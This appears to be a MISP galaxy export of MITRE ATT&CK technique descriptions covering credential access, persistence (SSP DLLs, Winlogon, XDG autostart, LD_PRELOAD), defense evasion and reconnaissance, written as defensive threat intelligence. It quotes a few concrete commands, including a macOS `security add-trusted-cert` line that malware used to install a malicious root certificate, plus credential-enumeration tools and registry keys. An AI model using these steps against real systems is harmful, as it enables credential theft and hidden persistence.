Credential Lockers store credentials in encrypted `<code>.vcrd</code>` files, located under `<code>%Systemdrive%\Users\[Username]\AppData\Local\Microsoft\[Vault/Credentials]\</code>.

The encryption key can be found in a file named `<code>Policy.vpol</code>`, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)

Adversaries may list credentials managed by the Windows Credential Manager through several mechanisms. `<code>vaultcmd.exe</code>` is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as `<code>CredEnumerateA</code>` to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)
Adversaries may use password recovery tools to obtain plain text passwords from the Credential Manager. (Citation: Malwarebytes The Windows Vault)

The tag is: `misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004"`

**Table 3280. Table References**

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**Network Device Authentication - T1556.004**

Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.

[Modify System Image](https://attack.mitre.org/techniques/T1601) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials. (Citation: FireEye - Synful Knock)

The tag is: `misp-galaxy:mitre-attack-pattern="Network Device Authentication - T1556.004"`

**Table 3281. Table References**

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Hidden File System - T1564.005

Adversaries may use a hidden file system to conceal malicious activity from users and security tools. File systems provide a structure to store and access data from physical storage. Typically, a user engages with a file system through applications that allow them to access files and directories, which are an abstraction from their physical location (ex: disk sector). Standard file systems include FAT, NTFS, ext4, and APFS. File systems can also contain other structures, such as the Volume Boot Record (VBR) and Master File Table (MFT) in NTFS. (Citation: MalwareTech VFS Nov 2014)

Adversaries may use their own abstracted file system, separate from the standard file system present on the infected system. In doing so, adversaries can hide the presence of malicious components and file input/output from security tools. Hidden file systems, sometimes referred to as virtual file systems, can be implemented in numerous ways. One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions. (Citation: MalwareTech VFS Nov 2014) (Citation: FireEye Bootkits) Another implementation could be for an adversary to drop their own portable partition image as a file on top of the standard file system. (Citation: ESET ComRAT May 2020) Adversaries may also fragment files across the existing file system structure in non-standard ways. (Citation: Kaspersky Equation QA)

The tag is: misp-galaxy:mitre-attack-pattern="Hidden File System - T1564.005"

Table 3282. Table References

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Security Support Provider - T1547.005

Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.

The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called. (Citation: Graeber 2014)
Run Virtual Instance - T1564.006

Adversaries may carry out malicious operations using a virtual instance to avoid detection. A wide variety of virtualization technologies exist that allow for the emulation of a computer or computing environment. By running malicious code inside of a virtual instance, adversaries can hide artifacts associated with their behavior from security tools that are unable to monitor activity inside the virtual instance. Additionally, depending on the virtual networking implementation (ex: bridged adapter), network traffic generated by the virtual instance can be difficult to trace back to the compromised host as the IP address and hostname might not match known values.(Citation: SingHealth Breach Jan 2019)

Adversaries may utilize native support for virtualization (ex: Hyper-V) or drop the necessary files to run a virtual instance (ex: VirtualBox binaries). After running a virtual instance, adversaries may create a shared folder between the guest and host with permissions that enable the virtual instance to interact with the host file system.(Citation: Sophos Ragnar May 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Run Virtual Instance - T1564.006"

Netsh Helper DLL - T1546.007

Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>. Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen
automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)

The tag is: misp-galaxy:mitre-attack-pattern="Netsh Helper DLL - T1546.007"

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<td><a href="https://github.com/outflankbv/NetshHelperBeacon">https://github.com/outflankbv/NetshHelperBeacon</a></td>
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Dynamic Linker Hijacking - T1574.006

Adversaries may execute their own malicious payloads by hijacking environment variables the dynamic linker uses to load shared libraries. During the execution preparation phase of a program, the dynamic linker loads specified absolute paths of shared libraries from environment variables and files, such as <code>LD_PRELOAD</code> on Linux or <code>DYLD_INSERT_LIBRARIES</code> on macOS. Libraries specified in environment variables are loaded first, taking precedence over system libraries with the same function name. (Citation: Man LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic Libraries) These variables are often used by developers to debug binaries without needing to recompile, deconflict mapped symbols, and implement custom functions without changing the original library. (Citation: Baeldung LD_PRELOAD)

On Linux and macOS, hijacking dynamic linker variables may grant access to the victim process’s memory, system/network resources, and possibly elevated privileges. This method may also evade detection from security products since the execution is masked under a legitimate process. Adversaries can set environment variables via the command line using the <code>export</code> command, <code>setenv</code> function, or <code>putenv</code> function. Adversaries can also leverage [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export variables in a shell or set variables programmatically using higher level syntax such Python’s <code>os.environ</code>.

On Linux, adversaries may set <code>LD_PRELOAD</code> to point to malicious libraries that match the name of legitimate libraries which are requested by a victim program, causing the operating system to load the adversary's malicious code upon execution of the victim program. <code>LD_PRELOAD</code> can be set via the environment variable or <code>/etc/ld.so.preload</code> file. (Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by <code>LD_PRELOAD</code> are loaded and mapped into memory by <code>dlopen()</code> and <code>mmap()</code> respectively. (Citation: Code Injection on Linux and macOS)(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers)
On macOS this behavior is conceptually the same as on Linux, differing only in how the macOS dynamic libraries (dyld) is implemented at a lower level. Adversaries can set the `DYLD_INSERT_LIBRARIES` environment variable to point to malicious libraries containing names of legitimate libraries or functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass)

The tag is: `misp-galaxy:mitre-attack-pattern="Dynamic Linker Hijacking - T1574.006"`

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### Revert Cloud Instance - T1578.004

An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.

Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.(Citation: TechRepublic - Restore AWS Snapshots)(Citation: Google - Restore Cloud Snapshot)

The tag is: `misp-galaxy:mitre-attack-pattern="Revert Cloud Instance - T1578.004"`

### Table 3287. Table References
XDG Autostart Entries - T1547.013

Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the `<code>/etc/xdg/autostart</code>` or `<code>~/.config/autostart</code>` directories and have a .desktop file extension. (Citation: Free Desktop Application Autostart Feb 2006)

Within an XDG autostart entry file, the `<code>Type</code>` key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The `<code>Name</code>` key indicates an arbitrary name assigned by the creator and the `<code>Exec</code>` key indicates the application and command line arguments to execute. (Citation: Free Desktop Entry Keys)

Adversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs.

The tag is: `misp-galaxy:mitre-attack-pattern="XDG Autostart Entries - T1547.013"`

**Table 3288. Table References**

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Identify business processes/tempo - T1280

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1280).

Understanding an organizations business processes and tempo may allow an adversary to more effectively craft social engineering attempts or to better hide technical actions, such as those that generate network traffic. (Citation: Scasny2015) (Citation: Infosec-osint)
System Owner/User Discovery - T1033

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Utilities and commands that acquire this information include `<code>whoami</code>`. In Mac and Linux, the currently logged in user can be identified with `<code>w</code>` and `<code>who</code>`.

Disguise Root/Jailbreak Indicators - T1408

An adversary could use knowledge of the techniques used by security software to evade detection(Citation: Brodie)(Citation: Tan). For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed "su" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection(Citation: Rastogi).

1418
Obtain templates/branding materials - T1281

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1281).

Templates and branding materials may be used by an adversary to add authenticity to social engineering message. (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Obtain templates/branding materials - T1281"

Table 3292. Table References

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<td><a href="https://attack.mitre.org/techniques/T1281">https://attack.mitre.org/techniques/T1281</a></td>
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Research relevant vulnerabilities/CVEs - T1291

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1291).

Common Vulnerability Enumeration (CVE) is a dictionary of publicly known information about security vulnerabilities and exposures. An adversary can use this information to target specific software that may be vulnerable. (Citation: WeaponsVulnerable) (Citation: KasperskyCarbanak)

The tag is: misp-galaxy:mitre-attack-pattern="Research relevant vulnerabilities/CVEs - T1291"

Table 3293. Table References

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Conduct cost/benefit analysis - T1226

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1226).

Leadership conducts a cost/benefit analysis that generates a compelling need for information gathering which triggers a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). For example, an adversary compares the cost of cyber intrusions with the expected benefits from...
increased intelligence collection on cyber adversaries. (Citation: LowenthalCh4) (Citation: KIT-Herring)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct cost/benefit analysis - T1226"

Table 3294. Table References

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Assess KITs/KIQs benefits - T1229

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1229).

Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) may be further subdivided to focus on political, economic, diplomatic, military, financial, or intellectual property categories. An adversary may specify KITs or KIQs in this manner in order to understand how the information they are pursuing can have multiple uses and to consider all aspects of the types of information they need to target for a particular purpose. (Citation: CompetitiveIntelligence) (Citation: CompetitiveIntelligence)KIT.

The tag is: misp-galaxy:mitre-attack-pattern="Assess KITs/KIQs benefits - T1229"

Table 3295. Table References

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Determine approach/attack vector - T1245

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1245).

The approach or attack vector outlines the specifics behind how the adversary would like to attack the target. As additional information is known through the other phases of PRE-ATT&CK, an adversary may update the approach or attack vector. (Citation: CyberAdversaryBehavior) (Citation: WITCHCOVEN2015) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine approach/attack vector - T1245"

Table 3296. Table References

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Mine technical blogs/forums - T1257

This object is deprecated as its content has been merged into the enterprise domain. Please see the \[PRE\](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved \[here\](https://attack.mitre.org/versions/v7/techniques/T1257).

Technical blogs and forums provide a way for technical staff to ask for assistance or troubleshoot problems. In doing so they may reveal information such as operating system (OS), network devices, or applications in use. (Citation: FunAndSun2012)

The tag is: *misp-galaxy:mitre-attack-pattern="Mine technical blogs/forums - T1257"

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Unused/Unsupported Cloud Regions - T1535

Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.

Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.

A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.

An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)

The tag is: *misp-galaxy:mitre-attack-pattern="Unused/Unsupported Cloud Regions - T1535"

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<td><a href="https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc">https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc</a></td>
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Search Open Websites/Domains - T1593

Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts. (Citation: Cyware Social Media) (Citation: SecurityTrails Google Hacking) (Citation: ExploitDB GoogleHacking)

Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: *misp-galaxy:mitre-attack-pattern="Search Open Websites/Domains - T1593"

Table 3299. Table References

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<td><a href="https://securitytrails.com/blog/google-hacking-techniques">https://securitytrails.com/blog/google-hacking-techniques</a></td>
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<td><a href="https://www.exploit-db.com/google-hacking-database">https://www.exploit-db.com/google-hacking-database</a></td>
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Obtain booter/stressor subscription - T1396

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1396).

Configure and setup booter/stressor services, often intended for server stress testing, to enable denial of service attacks. (Citation: Krebs-Anna) (Citation: Krebs-Booter) (Citation: Krebs-Bazaar)

The tag is: *misp-galaxy:mitre-attack-pattern="Obtain booter/stressor subscription - T1396"

Table 3300. Table References

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<td><a href="https://attack.mitre.org/techniques/T1396">https://attack.mitre.org/techniques/T1396</a></td>
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<td><a href="https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/">https://krebsonsecurity.com/2016/10/are-the-days-of-booter-services-numbered/</a></td>
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</table>
Application Window Discovery - T1010

Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.

The tag is: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010"

Table 3301. Table References

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OS Credential Dumping - T1003

Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.

Several of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.

The tag is: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003"

Table 3302. Table References

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<td><a href="https://attack.mitre.org/techniques/T1003">https://attack.mitre.org/techniques/T1003</a></td>
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Winlogon Helper DLL - T1004

Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon</code>
and `<code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon</code>` are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)

Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)

- **Winlogon\Notify** - points to notification package DLLs that handle Winlogon events
- **Winlogon\Userinit** - points to userinit.exe, the user initialization program executed when a user logs on
- **Winlogon\Shell** - points to explorer.exe, the system shell executed when a user logs on

Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.

The tag is: *misp-galaxy:mitre-attack-pattern*="Winlogon Helper DLL - T1004"

Winlogon Helper DLL - T1004 has relationships with:

- revoked-by: *misp-galaxy:mitre-attack-pattern*="Winlogon Helper DLL - T1547.004" with estimative-language:likelihood-probability="almost-certain"

**Table 3303. Table References**

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**Modify System Partition - T1400**

If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device system partition, where it may persist after device resets and may not be easily removed by the device user.

Many Android devices provide the ability to unlock the bootloader for development purposes. An unlocked bootloader may provide the ability for an adversary to modify the system partition. Even if the bootloader is locked, it may be possible for an adversary to escalate privileges and then modify the system partition.

The tag is: *misp-galaxy:mitre-attack-pattern*="Modify System Partition - T1400"

**Table 3304. Table References**

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<td><a href="https://attack.mitre.org/techniques/T1400">https://attack.mitre.org/techniques/T1400</a></td>
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Compile After Delivery - T1500

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)

Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193). Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)

The tag is: `misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1500"

Compile After Delivery - T1500 has relationships with:

- revoked-by: `misp-galaxy:mitre-attack-pattern="Compile After Delivery - T1027.004"` with estimative-language:likelihood-probability="almost-certain"

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Direct Volume Access - T1006

Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique bypasses Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)

Utilities, such as NinjaCopy, exist to perform these actions in PowerShell. (Citation: Github PowerSploit Ninjacopy)

The tag is: `misp-galaxy:mitre-attack-pattern="Direct Volume Access - T1006"`
Table 3306. Table References

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<td><a href="https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1">https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1</a></td>
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**System Service Discovery - T1007**

Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using [Tasklist](https://attack.mitre.org/software/S0057), and "net start" using [Net](https://attack.mitre.org/software/S0039), but adversaries may also use other tools as well. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: **misp-galaxy:mitre-attack-pattern="System Service Discovery - T1007"**

Table 3307. Table References

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**Taint Shared Content - T1080**

Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.

A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)

Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The
malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.

The tag is: *misp-galaxy:mitre-attack-pattern*="Taint Shared Content - T1080"

### Security Support Provider - T1101

Windows Security Support Provider (SSP) DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: `<code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code>` and `<code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>`. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called. (Citation: Graeber 2014)

The tag is: *misp-galaxy:mitre-attack-pattern*="Security Support Provider - T1101"

Security Support Provider - T1101 has relationships with:


### Peripheral Device Discovery - T1120

Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network
environment or may be used for further actions.

The tag is: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120"

Table 3310. Table References

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**Password Policy Discovery - T1201**

Adversaries may attempt to access detailed information about the password policy used within an enterprise network. Password policies for networks are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).

Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as `<code>net accounts (/domain)</code>`, `<code>Get-ADDefaultDomainPasswordPolicy</code>`, `<code>chage -l <username></code>`, `<code>cat /etc/pam.d/common-password</code>`, and `<code>pwpolicy getaccountpolicies</code>.(Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies)

The tag is: misp-galaxy:mitre-attack-pattern="Password Policy Discovery - T1201"

Table 3311. Table References

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**Analyze business processes - T1301**

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1301).

Business processes, such as who typically communicates with who, or what the supply chain is for a particular part, provide opportunities for social engineering or other (Citation: Warwick2015)

The tag is: misp-galaxy:mitre-attack-pattern="Analyze business processes - T1301"

Table 3312. Table References
Install Root Certificate - T1130

Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. (Citation: Wikipedia Root Certificate) Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.

Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system. Adversaries have used this technique to avoid security warnings prompting users when compromised systems connect over HTTPS to adversary controlled web servers that spoof legitimate websites in order to collect login credentials. (Citation: Operation Emmental)

Atypical root certificates have also been pre-installed on systems by the manufacturer or in the software supply chain and were used in conjunction with malware/adware to provide a man-in-the-middle capability for intercepting information transmitted over secure TLS/SSL communications. (Citation: Kaspersky Superfish)

Root certificates (and their associated chains) can also be cloned and reinstalled. Cloned certificate chains will carry many of the same metadata characteristics of the source and can be used to sign malicious code that may then bypass signature validation tools (ex: Sysinternals, antivirus, etc.) used to block execution and/or uncover artifacts of Persistence. (Citation: SpectorOps Code Signing Dec 2017)

In macOS, the Ay MaMi malware uses `/usr/bin/security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain /path/to/malicious/cert` to install a malicious certificate as a trusted root certificate into the system keychain. (Citation: objective-see ay mami 2018)

The tag is: `misp-galaxy:mitre-attack-pattern="Install Root Certificate - T1130"

Install Root Certificate - T1130 has relationships with:


Table 3313. Table References

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<td><a href="https://en.wikipedia.org/wiki/Root_certificate">https://en.wikipedia.org/wiki/Root_certificate</a></td>
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1429
Modify Existing Service - T1031

Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).

Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.

Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)

The tag is: `misp-galaxy:mitre-attack-pattern="Modify Existing Service - T1031"

Modify Existing Service - T1031 has relationships with:

- revoked-by: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 3314. Table References

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Device Administrator Permissions - T1401

Adversaries may request device administrator permissions to perform malicious actions.
By abusing the device administration API, adversaries can perform several nefarious actions, such as resetting the device's password for [Device Lockout](https://attack.mitre.org/techniques/T1446), factory resetting the device to [Delete Device Data](https://attack.mitre.org/techniques/T1447) and any traces of the malware, disabling all of the device's cameras, or make it more difficult to uninstall the app. (Citation: Android DeviceAdminInfo)

Device administrators must be approved by the user at runtime, with a system popup showing which of the actions have been requested by the app. In conjunction with other techniques, such as [Input Injection](https://attack.mitre.org/techniques/T1516), an app can programmatically grant itself administrator permissions without any user input.

The tag is: `misp-galaxy:mitre-attack-pattern="Device Administrator Permissions - T1401"`

**Table 3315. Table References**

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**Ingress Tool Transfer - T1105**

Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.

The tag is: `misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"`

**Table 3316. Table References**

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<td><a href="https://attack.mitre.org/techniques/T1105">https://attack.mitre.org/techniques/T1105</a></td>
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**Graphical User Interface - T1061**

This technique has been deprecated. Please use [Remote Services](https://attack.mitre.org/techniques/T1021) where appropriate.

The Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system's GUI during an operation, commonly through a remote interactive session such as [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076), instead of through a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command (Citation: Wikipedia Run Command), or other potentially difficult to monitor.
Modify System Image - T1601

Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.

To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.

The tag is: misp-galaxy:mitre-attack-pattern="Modify System Image - T1601"

Application Deployment Software - T1017

Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.

Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.

The tag is: misp-galaxy:mitre-attack-pattern="Application Deployment Software - T1017"

Application Deployment Software - T1017 has relationships with:

